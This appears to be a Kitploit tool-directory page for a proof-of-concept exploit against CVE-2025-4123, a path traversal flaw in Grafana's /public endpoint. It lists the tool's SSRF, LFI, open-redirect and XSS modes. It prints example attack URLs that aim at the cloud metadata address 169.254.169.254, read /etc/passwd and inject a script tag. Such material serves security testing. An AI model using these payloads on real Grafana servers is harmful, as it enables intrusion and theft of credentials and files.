Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2025-4123-Exploit-Tool-Grafana- — CVE-2025-4123 - Grafana Tool | Kitploit
Tools/GitHubGitHub/ynsmroztas/cve-2025-4123-exploit-tool-grafana-
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationRed Teaming
GitHubynsmroztas/cve-2025-4123-exploit-tool-grafana-

CVE-2025-4123-Exploit-Tool-Grafana-

CVE-2025-4123 - Grafana Tool

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share
View Repository
3261 year agoReviewed by Kitploit

CVE-2025-4123 - Grafana Path Traversal Exploit

Developed by mitsec

This is a proof-of-concept (PoC) exploit tool for CVE-2025-4123, a critical path traversal vulnerability in Grafana's /public endpoint. The exploit allows for:

  • ✅ Server-Side Request Forgery (SSRF)
  • ✅ Local File Inclusion (LFI)
  • ✅ Open Redirect
  • ✅ Cross-Site Scripting (XSS)

🔥 Affected

Grafana instances with /public/ endpoint improperly handling encoded paths like:

root@kitploit:~
/public/..%2F%5coast.pro%2F%3f%2F..%2F..

🚀 Usage

root@kitploit:~
python3 cve_2025_4123_exploit_mitsec_final.py

Then select the desired mode:

  1. SSRF - Internal services like 169.254.169.254
  2. LFI - Read files like /etc/passwd
  3. Open Redirect - Redirect to external domains
  4. XSS - JavaScript injection in public path

🧪 Example

root@kitploit:~
[*] SSRF URL: http://127.0.0.1:3000/public/..%2F%5C169.254.169.254/latest/meta-data/%2F%3f%2F..%2F..
[*] LFI URL:  http://127.0.0.1:3000/public/..%2F%5coast.pro%2F%3f%2F..%2F..%2F..%2Fetc%2Fpasswd
[*] XSS URL:  http://127.0.0.1:3000/public/%3Cscript%3Ealert('mitsec')%3C%2Fscript%3E

📄 Disclaimer

This code is provided for educational and authorized testing purposes only. Unauthorized use against systems without consent is illegal.


✍️ Author

  • mitsec
Download Tool